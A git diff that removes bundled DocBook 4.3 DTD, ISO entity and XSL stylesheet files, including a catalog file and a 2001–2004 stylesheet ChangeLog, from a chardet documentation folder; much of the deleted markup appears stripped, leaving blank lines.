-]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> - -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> - -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - - - - -]]> - - - -]]> - ]]> - - - - - - - -]]> - - - -]]> - ]]> - - - - - - - -]]> - - - -]]> - ]]> - - - - - - - -]]> - - - -]]> - ]]> - - - - - - - -]]> - - - -]]> - ]]> - - - - - - - -]]> - - - -]]> - ]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> - ]]> - - -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - -]]> - - - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - -]]> - - - - - - - -]]> -]]> - - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - - - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - -]]> - - - -]]> -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - -]]> -]]> - - - - - - - -]]> - - - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - -]]> - - - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - - - -]]> -]]> - - - - - - - - - -]]> - - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - - - - -]]> - - - - - - - - - - -]]> -]]> - - - - - - - - -]]> - - - - -]]> - - - - -]]> - - - - -]]> - - - - -]]> - - - - -]]> - -]]> - - - - - - - -]]> - - - -]]> - - - -]]> - - - -]]> -]]> -]]> - - - diff --git a/chardet/docs/docbook/dtd/docbook.cat b/chardet/docs/docbook/dtd/docbook.cat deleted file mode 100644 index 05dee55..0000000 --- a/chardet/docs/docbook/dtd/docbook.cat +++ /dev/null @@ -1,110 +0,0 @@ - -- ...................................................................... -- - -- Catalog data for DocBook XML V4.3 .................................... -- - -- File docbook.cat ..................................................... -- - - -- Please direct all questions, bug reports, or suggestions for - changes to the docbook@lists.oasis-open.org mailing list. For more - information, see http://www.oasis-open.org/. - -- - - -- This is the catalog data file for DocBook XML V4.3. It is provided as - a convenience in building your own catalog files. You need not use - the filenames listed here, and need not use the filename method of - identifying storage objects at all. See the documentation for - detailed information on the files associated with the DocBook DTD. - See SGML Open Technical Resolution 9401 for detailed information - on supplying and using catalog data. - -- - - -- ...................................................................... -- - -- DocBook driver file .................................................. -- - -PUBLIC "-//OASIS//DTD DocBook XML V4.3//EN" - "docbookx.dtd" - - -- ...................................................................... -- - -- DocBook modules ...................................................... -- - -PUBLIC "-//OASIS//DTD DocBook CALS Table Model V4.3//EN" - "calstblx.dtd" - -PUBLIC "-//OASIS//DTD XML Exchange Table Model 19990315//EN" - "soextblx.dtd" - -PUBLIC "-//OASIS//ELEMENTS DocBook Information Pool V4.3//EN" - "dbpoolx.mod" - -PUBLIC "-//OASIS//ELEMENTS DocBook Document Hierarchy V4.3//EN" - "dbhierx.mod" - -PUBLIC "-//OASIS//ENTITIES DocBook Additional General Entities V4.3//EN" - "dbgenent.mod" - -PUBLIC "-//OASIS//ENTITIES DocBook Notations V4.3//EN" - "dbnotnx.mod" - -PUBLIC "-//OASIS//ENTITIES DocBook Character Entities V4.3//EN" - "dbcentx.mod" - - -- ...................................................................... -- - -- ISO entity sets ...................................................... -- - -PUBLIC "ISO 8879:1986//ENTITIES Diacritical Marks//EN//XML" - "ent/iso-dia.ent" - -PUBLIC "ISO 8879:1986//ENTITIES Numeric and Special Graphic//EN//XML" - "ent/iso-num.ent" - -PUBLIC "ISO 8879:1986//ENTITIES Publishing//EN//XML" - "ent/iso-pub.ent" - -PUBLIC "ISO 8879:1986//ENTITIES General Technical//EN//XML" - "ent/iso-tech.ent" - -PUBLIC "ISO 8879:1986//ENTITIES Added Latin 1//EN//XML" - "ent/iso-lat1.ent" - -PUBLIC "ISO 8879:1986//ENTITIES Added Latin 2//EN//XML" - "ent/iso-lat2.ent" - -PUBLIC "ISO 8879:1986//ENTITIES Greek Letters//EN//XML" - "ent/iso-grk1.ent" - -PUBLIC "ISO 8879:1986//ENTITIES Monotoniko Greek//EN//XML" - "ent/iso-grk2.ent" - -PUBLIC "ISO 8879:1986//ENTITIES Greek Symbols//EN//XML" - "ent/iso-grk3.ent" - -PUBLIC "ISO 8879:1986//ENTITIES Alternative Greek Symbols//EN//XML" - "ent/iso-grk4.ent" - -PUBLIC "ISO 8879:1986//ENTITIES Added Math Symbols: Arrow Relations//EN//XML" - "ent/iso-amsa.ent" - -PUBLIC "ISO 8879:1986//ENTITIES Added Math Symbols: Binary Operators//EN//XML" - "ent/iso-amsb.ent" - -PUBLIC "ISO 8879:1986//ENTITIES Added Math Symbols: Delimiters//EN//XML" - "ent/iso-amsc.ent" - -PUBLIC "ISO 8879:1986//ENTITIES Added Math Symbols: Negated Relations//EN//XML" - "ent/iso-amsn.ent" - -PUBLIC "ISO 8879:1986//ENTITIES Added Math Symbols: Ordinary//EN//XML" - "ent/iso-amso.ent" - -PUBLIC "ISO 8879:1986//ENTITIES Added Math Symbols: Relations//EN//XML" - "ent/iso-amsr.ent" - -PUBLIC "ISO 8879:1986//ENTITIES Box and Line Drawing//EN//XML" - "ent/iso-box.ent" - -PUBLIC "ISO 8879:1986//ENTITIES Russian Cyrillic//EN//XML" - "ent/iso-cyr1.ent" - -PUBLIC "ISO 8879:1986//ENTITIES Non-Russian Cyrillic//EN//XML" - "ent/iso-cyr2.ent" - - -- End of catalog data for DocBook XML V4.3 ............................. -- - -- ...................................................................... -- diff --git a/chardet/docs/docbook/dtd/docbookx.dtd b/chardet/docs/docbook/dtd/docbookx.dtd deleted file mode 100644 index e7cb9df..0000000 --- a/chardet/docs/docbook/dtd/docbookx.dtd +++ /dev/null @@ -1,165 +0,0 @@ - - - - - - - - - - - - - - - -]]> - - - - - - - - - -]]> -]]> - - - -]]> - - - -]]> - - - - - - -%dbnotn; -]]> - - - - - - -]]> - -]]> - - -%dbcent; -]]> - - - - - - - - -%dbpool; -]]> - - - - - - -%rdbmods; -]]> - - - - - -%dbhier; -]]> - - - - - - -%dbgenent; -]]> - - - diff --git a/chardet/docs/docbook/dtd/ent/iso-amsa.ent b/chardet/docs/docbook/dtd/ent/iso-amsa.ent deleted file mode 100644 index 1b64b46..0000000 --- a/chardet/docs/docbook/dtd/ent/iso-amsa.ent +++ /dev/null @@ -1,63 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/dtd/ent/iso-amsb.ent b/chardet/docs/docbook/dtd/ent/iso-amsb.ent deleted file mode 100644 index 38bd2e7..0000000 --- a/chardet/docs/docbook/dtd/ent/iso-amsb.ent +++ /dev/null @@ -1,49 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/dtd/ent/iso-amsc.ent b/chardet/docs/docbook/dtd/ent/iso-amsc.ent deleted file mode 100644 index 8485fe3..0000000 --- a/chardet/docs/docbook/dtd/ent/iso-amsc.ent +++ /dev/null @@ -1,15 +0,0 @@ - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/dtd/ent/iso-amsn.ent b/chardet/docs/docbook/dtd/ent/iso-amsn.ent deleted file mode 100644 index 7e9d578..0000000 --- a/chardet/docs/docbook/dtd/ent/iso-amsn.ent +++ /dev/null @@ -1,66 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/dtd/ent/iso-amso.ent b/chardet/docs/docbook/dtd/ent/iso-amso.ent deleted file mode 100644 index 61f5c4d..0000000 --- a/chardet/docs/docbook/dtd/ent/iso-amso.ent +++ /dev/null @@ -1,26 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/dtd/ent/iso-amsr.ent b/chardet/docs/docbook/dtd/ent/iso-amsr.ent deleted file mode 100644 index 9ef9da0..0000000 --- a/chardet/docs/docbook/dtd/ent/iso-amsr.ent +++ /dev/null @@ -1,91 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/dtd/ent/iso-box.ent b/chardet/docs/docbook/dtd/ent/iso-box.ent deleted file mode 100644 index 1f87530..0000000 --- a/chardet/docs/docbook/dtd/ent/iso-box.ent +++ /dev/null @@ -1,45 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/dtd/ent/iso-cyr1.ent b/chardet/docs/docbook/dtd/ent/iso-cyr1.ent deleted file mode 100644 index 2516f8e..0000000 --- a/chardet/docs/docbook/dtd/ent/iso-cyr1.ent +++ /dev/null @@ -1,72 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/dtd/ent/iso-cyr2.ent b/chardet/docs/docbook/dtd/ent/iso-cyr2.ent deleted file mode 100644 index 3edbde0..0000000 --- a/chardet/docs/docbook/dtd/ent/iso-cyr2.ent +++ /dev/null @@ -1,31 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/dtd/ent/iso-dia.ent b/chardet/docs/docbook/dtd/ent/iso-dia.ent deleted file mode 100644 index 3a4b55c..0000000 --- a/chardet/docs/docbook/dtd/ent/iso-dia.ent +++ /dev/null @@ -1,19 +0,0 @@ - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/dtd/ent/iso-grk1.ent b/chardet/docs/docbook/dtd/ent/iso-grk1.ent deleted file mode 100644 index b040985..0000000 --- a/chardet/docs/docbook/dtd/ent/iso-grk1.ent +++ /dev/null @@ -1,54 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/dtd/ent/iso-grk2.ent b/chardet/docs/docbook/dtd/ent/iso-grk2.ent deleted file mode 100644 index 63de411..0000000 --- a/chardet/docs/docbook/dtd/ent/iso-grk2.ent +++ /dev/null @@ -1,25 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/dtd/ent/iso-grk3.ent b/chardet/docs/docbook/dtd/ent/iso-grk3.ent deleted file mode 100644 index b59c53c..0000000 --- a/chardet/docs/docbook/dtd/ent/iso-grk3.ent +++ /dev/null @@ -1,48 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/dtd/ent/iso-grk4.ent b/chardet/docs/docbook/dtd/ent/iso-grk4.ent deleted file mode 100644 index ace7c81..0000000 --- a/chardet/docs/docbook/dtd/ent/iso-grk4.ent +++ /dev/null @@ -1,48 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/dtd/ent/iso-lat1.ent b/chardet/docs/docbook/dtd/ent/iso-lat1.ent deleted file mode 100644 index 2ec16ff..0000000 --- a/chardet/docs/docbook/dtd/ent/iso-lat1.ent +++ /dev/null @@ -1,67 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/dtd/ent/iso-lat2.ent b/chardet/docs/docbook/dtd/ent/iso-lat2.ent deleted file mode 100644 index e94ec18..0000000 --- a/chardet/docs/docbook/dtd/ent/iso-lat2.ent +++ /dev/null @@ -1,126 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/dtd/ent/iso-num.ent b/chardet/docs/docbook/dtd/ent/iso-num.ent deleted file mode 100644 index 7f4844c..0000000 --- a/chardet/docs/docbook/dtd/ent/iso-num.ent +++ /dev/null @@ -1,81 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/dtd/ent/iso-pub.ent b/chardet/docs/docbook/dtd/ent/iso-pub.ent deleted file mode 100644 index 56ede36..0000000 --- a/chardet/docs/docbook/dtd/ent/iso-pub.ent +++ /dev/null @@ -1,90 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/dtd/ent/iso-tech.ent b/chardet/docs/docbook/dtd/ent/iso-tech.ent deleted file mode 100644 index 7264f6b..0000000 --- a/chardet/docs/docbook/dtd/ent/iso-tech.ent +++ /dev/null @@ -1,69 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/dtd/htmltblx.mod b/chardet/docs/docbook/dtd/htmltblx.mod deleted file mode 100644 index e5164ae..0000000 --- a/chardet/docs/docbook/dtd/htmltblx.mod +++ /dev/null @@ -1,228 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/dtd/soextblx.dtd b/chardet/docs/docbook/dtd/soextblx.dtd deleted file mode 100644 index 789c79a..0000000 --- a/chardet/docs/docbook/dtd/soextblx.dtd +++ /dev/null @@ -1,314 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/xsl/VERSION b/chardet/docs/docbook/xsl/VERSION deleted file mode 100644 index 05907f6..0000000 --- a/chardet/docs/docbook/xsl/VERSION +++ /dev/null @@ -1,84 +0,0 @@ - - - - - - - - - DocBook - XSL Stylesheets - 1.65.1 - - - - - - - - Minor bugfixes - - - - - http://sourceforge.net/projects/docbook/ - http://prdownloads.sourceforge.net/docbook/docbook-xsl-{VERSION}.tar.gz?download - http://prdownloads.sourceforge.net/docbook/docbook-xsl-{VERSION}.zip?download - http://sourceforge.net/project/shownotes.php?release_id={SFRELID} - http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/docbook/xsl/ - http://lists.oasis-open.org/archives/docbook-apps/ - Small bug fixes. Fixed CA localization. - - - - - - - You must specify the sf-relid as a parameter. - - - - - - - - - - - - - - - - - - : - - - - - - - - - : - - - - - - - - - : - - - - - diff --git a/chardet/docs/docbook/xsl/common/ChangeLog b/chardet/docs/docbook/xsl/common/ChangeLog deleted file mode 100644 index 4497938..0000000 --- a/chardet/docs/docbook/xsl/common/ChangeLog +++ /dev/null @@ -1,624 +0,0 @@ -2004-02-18 Robert Stayton - - * labels.xsl: Turn off procedure number when formal.procedures = 0. - -2004-01-29 Norman Walsh - - * subtitles.xsl, titles.xsl: Support 'info' - -2004-01-26 Robert Stayton - - * targets.xsl: Pass empty doctype parameters to write.chunk so the - output can be used as an entity without DOCTYPE. - -2003-12-31 Jirka Kosek - - * autoidx-ng.xsl, l10n.dtd: Added support for new i18n friendly indexing method - -2003-12-15 Norman Walsh - - * .cvsignore, Makefile: Support sr_Latn locale - -2003-12-13 Robert Stayton - - * l10n.xml: Added sr_Latn.xml for Serbian in Latin script. - -2003-12-06 Robert Stayton - - * common.xsl: Fixed bug #851603 infinite recursion in copyright.year when - no elements at all. - -2003-12-05 Robert Stayton - - * common.xsl: section.level now computes refentry sections relative to container element. - -2003-11-30 Robert Stayton - - * gentext.xsl, labels.xsl, subtitles.xsl, table.xsl, targets.xsl, titles.xsl: - Added CVS $Id: ChangeLog,v 1.1.1.1 2004/06/22 02:08:37 f8dy Exp $ comment. - -2003-11-17 Robert Stayton - - * labels.xsl: Fixed bug where sect1 generated infinite loop when root element - and $section.label.includes.component.label is non zero. - -2003-10-12 Robert Stayton - - * gentext.xsl: Fixed cut-and-paste typo in substitute.markup template. - -2003-09-23 Robert Stayton - - * pi.xsl: Fixed dbdatetime PI, which was using context - datetime-abbrev for format "B" rather than datetime-full. - -2003-08-27 Norman Walsh - - * titles.xsl: Support HTML tables - -2003-08-18 Norman Walsh - - * .cvsignore: Ignore generate XML documents for Latin and Bangla - - * Makefile, l10n.xml: Add support for Latin - -2003-07-31 Jirka Kosek - - * Makefile: Update Makefile to new gentext mechanism - -2003-07-31 Robert Stayton - - * gentext.xsl: Added template for question in object.xref.markup mode - to handle case of defaultlabel = qanda. - - * labels.xsl: Removed processing of @label on qandadiv since that is - not an allowed attribute of qandadiv. - -2003-07-25 Robert Stayton - - * Makefile, l10n.xml: Added bn.xml Bangla language. - - * gentext.xsl: Handles new xref contexts and the new xrefstyle attribute - on xref elements. - - * pi.xsl: Now uses new datetime-full and datetime-abbrev gentext - contexts for certain date components. - -2003-07-08 Robert Stayton - - * l10n.xsl: Removed extraneous variable l10n.name which is not used. - -2003-06-24 Robert Stayton - - * l10n.xsl: Fixed bug in l10n.language template where $target parameter - was missing from xpath expression. - -2003-06-21 Norman Walsh - - * .cvsignore, Makefile: Added Croatian - -2003-05-19 Norman Walsh - - * .cvsignore, Makefile: Added Arabic - -2003-05-08 Norman Walsh - - * titles.xsl: Support 'title.markup' on glossentry - -2003-04-29 Jirka Kosek - - * pi.xsl: Added localization support for datetime PI - -2003-04-27 - - * common.xsl: Added level 6 to test for section depth in section.level template so that section.title.level6.properties will be used for sections that are 6 deep or deeper. This should also cause a h6 to be created in html output. - -2003-04-16 Jirka Kosek - - * pi.xsl: Changed PI name from to - -2003-04-14 Jirka Kosek - - * pi.xsl: New file. - -2003-04-13 Norman Walsh - - * table.xsl: A few bug fixes for the colsep/rowsep code - -2003-04-12 Norman Walsh - - * common.xsl: Don't use SVG graphics if use.svg=0 - - * table.xsl: Support template to find out if there are more columns in the current row of a table - -2003-04-05 Robert Stayton - - * gentext.xsl: Now uses number-and-title-template for sections only - if $section.autolabel is not zero. - -2003-03-02 Jirka Kosek - - * common.xsl: Fixed several errors related to TeX math processing - -2003-02-25 Robert Stayton - - * l10n.dtd: Added missing 'english-language-name' attribute to the l10n - element, and the missing 'style' attribute to the template - element so the current gentext documents will validate. - -2003-01-30 Robert Stayton - - * common.xsl: Corrected several references to parameter $qanda.defaultlabel - that were missing the "$". - -2003-01-23 Adam Di Carlo - - * Makefile: make use of cvstools/Makefile.incl - -2003-01-20 Norman Walsh - - * gentext.xsl: Support experimental parameter to specify that number-and-title xrefs should be used even when things are numbered - - * gentext.xsl: Added object.titleabbrev.markup for consistency - - * l10n.xsl: Added gentext.template.exists to test if a gentext template exists. Clever name, huh? - - * titles.xsl: Expanded support for obtaining titleabbrevs - -2003-01-10 Norman Walsh - - * .cvsignore, l10n.xml: Added bg.xml - - * Makefile: Add Bulgarian - -2003-01-02 Norman Walsh - - * labels.xsl, titles.xsl: Support setindex (there were all sorts of things wrong with it) - -2003-01-01 Norman Walsh - - * table.xsl: CALS says the default for colsep and rowsep is 1. - - * table.xsl: Fix variable scoping problem - - * titles.xsl: Support titleabbrev (outside of info elements anyway) - -2002-12-18 Robert Stayton - - * common.xsl: The select.mediaobject.index template now uses the - $stylesheet.result.type parameter to choose the role - value, with xhtml falling back to html if needed. - -2002-12-17 Robert Stayton - - * common.xsl: Changed selection of mediaobject to be more consistent using - a separate select.mediaobject.index template. Also added - text-align to block containing external-graphic in fo output. - -2002-11-23 Robert Stayton - - * common.xsl: Fixed bug in orderedlist-starting-number test when - @continuation not set. - -2002-11-14 Norman Walsh - - * common.xsl: Handle nested refsections in section.level - - * gentext.xsl: Pass full xpath name to gentext.template instead of just the local-name - - * l10n.xsl: Make gentext.template search through /-separated names - -2002-10-19 Norman Walsh - - * l10n.xsl: Support output of language attribute - -2002-10-09 Norman Walsh - - * l10n.xsl: Make 3166 language codes work in upper or lowercase - -2002-10-02 Norman Walsh - - * common.xsl: Added orderedlist-starting-number and orderedlist-item-number templates - -2002-10-01 Robert Stayton - - * common.xsl: Changed the section.level template to return a number that matches - the section level (sect1 = 1, etc.). - -2002-09-27 Norman Walsh - - * l10n.xml: Add Thai - -2002-09-15 Norman Walsh - - * .cvsignore, Makefile, l10n.xml: Added LT and VI localizations - -2002-09-04 Norman Walsh - - * common.xsl: Refactor person.name templates so that it's easy to override them - - * l10n.xsl: Move l10n.* parameters into ../params so they can be properly documented; made l10n.gentext.use.xref.language a numeric boolean parameter instead of a proper boolean - -2002-09-03 Norman Walsh - - * common.xsl: Remove spurious character on line 432 - - * table.xsl: Make sure row-level colsep and rowsep values are 'inherited' onto missing cells - -2002-09-02 Norman Walsh - - * common.xsl: Support person-name style from localization data in personal names - -2002-08-28 Norman Walsh - - * table.xsl: Make inherited attributes work for 'missing' table cells - -2002-07-29 Robert Stayton - - * targetdatabase.dtd: Forgot to fix the attribute on the element - as well. - - * targetdatabase.dtd: Changed the targetptr attribute from #REQUIRED to #IMPLIED - since it is not required on all objects. - - * targetdatabase.dtd: Replaced targetid attribute on document with targetptr - per the decision of the DocBook Technical Committee. - -2002-07-17 Norman Walsh - - * labels.xsl: Fixed thinko - - * labels.xsl: Don't count equations without titles when labelling equations - -2002-07-13 Robert Stayton - - * targets.xsl: Fixed output encoding to utf-8 so a targets database - can handle mixed languages. - Added omit-xml-declaration to get around the standalone - attribute in the XML declaration not being permitted - in system entities. - -2002-07-09 Norman Walsh - - * labels.xsl: Bug #558333: use containing section for the label of a bridgehead if section.autolabel is non-zero - -2002-07-07 Robert Stayton - - * common.xsl: Changed the name of the second-order itemizedlist mark - from 'round' (not supported in browsers'
    'type' attribute) - to 'circle', which is supported. - Both are already supported in FO stylesheet. - -2002-07-06 Norman Walsh - - * targets.xsl: The default.encoding parameter has been renamed chunker.output.encoding - -2002-07-05 Robert Stayton - - * labels.xsl, titles.xsl: Added 'verbose' parameter to default templates in - title.markup mode and label.markup mode, and made - the error message conditional on that parameter. The - default value is 1, so the message will still be - there for normal usage. But the targets.xsl - stylesheet sets verbose to 0 when trolling for - cross reference targets to eliminate useless noise - on elements that have an id attribute but no title or label. - - * targetdatabase.dtd: New file. - - * targets.xsl: New file. - -2002-06-11 Norman Walsh - - * common.xsl: Augmented debugging message (commented out) - - * gentext.xsl: Experimental support for xrefstyle; support for %d in templates - - * l10n.xsl: Experimental support for xrefstyle - - * titles.xsl: Support refsynopsisdiv in title.markup mode - -2002-05-23 Norman Walsh - - * common.xsl: Support for SVG in HTML - -2002-05-21 Norman Walsh - - * gentext.xsl: Whitespace - - * labels.xsl: Don't generate '. ' after QandA labels - -2002-05-12 Norman Walsh - - * common.xsl: Fix bugs in extension checking in mediaobject.filename - - * l10n.xsl: Reworked test in gentext.template; should have no user-visible changes - - * table.xsl: Removed some obsolete templates; reworked inheritance for improved border support (still implements old DocBook semantics which aren't quite CALS) - - * titles.xsl: Improved error message - -2002-04-21 Norman Walsh - - * .cvsignore, Makefile, l10n.xml: Add support for Hebrew localization - -2002-03-24 Norman Walsh - - * common.xsl: Change comment: personname is no longer experimental - -2002-03-18 Norman Walsh - - * common.xsl: Replace generate.*.toc and generate.*.lot with single generate.toc parameter. - -2002-03-18 Robert Stayton - - * gentext.xsl: Replaced the substitute-markup template with one - using simpler logic. Added params for the content - to be substituted so it can be used with olinks - where the content is supplied from a data file. - -2002-03-14 Norman Walsh - - * common.xsl: Handle revisionflag a little better on copyrights - - * common.xsl, gentext.xsl, l10n.xsl, labels.xsl, subtitles.xsl, table.xsl, titles.xsl: - Whitespace only: change CR/LF back to LF. Norm was a total moron. - - * common.xsl, gentext.xsl, l10n.xsl, labels.xsl, subtitles.xsl, table.xsl, titles.xsl: - Whitespace changes only: use PC-style CR/LF because Unix clients choke on this far less often than PC clients choke on the reverse. Grrr. - -2002-03-07 Robert Stayton - - * titles.xsl: refentry title in title.markup mode now follows $allow-anchors setting - to prevent index entries from appearing in the TOC. - -2002-01-28 Norman Walsh - - * l10n.dtd, l10n.xml: Tweaks to the l10n.dtd to make it as namespace aware as DTDs can be - -2002-01-25 Norman Walsh - - * table.xsl: Fix bug that caused rowsep and colsep to be ignored on empty cells - -2002-01-10 Norman Walsh - - * l10n.xsl: Don't rely on the order of attribute nodes cause they don't have one - -2002-01-03 Norman Walsh - - * .cvsignore, Makefile: Added Thai localization - - * common.xsl: Calculate itemized list symbol based on depth analagous to orderedlist numeration - - * gentext.xsl: Use unnumbered gentext keys appropriately - -2001-12-15 Jirka Kosek - - * common.xsl: Improved support for TeX math inside equations. - -2001-12-04 Norman Walsh - - * labels.xsl: Bug #435320: Poor enumeration of LoTs and LoFs - - * titles.xsl: Bug! Can't put HTML here. But what does this break? - -2001-12-02 Norman Walsh - - * titles.xsl: Make no.anchor.mode 'sticky'. This is really necessary because otherwise title inlines effectively turn it off - -2001-12-01 Norman Walsh - - * labels.xsl: Improve FAQ labeling - -2001-11-29 Robert Stayton - - * l10n.xsl: Fixed error message for missing localization so that if - missing in en.xml, it doesn't say 'using en'. - 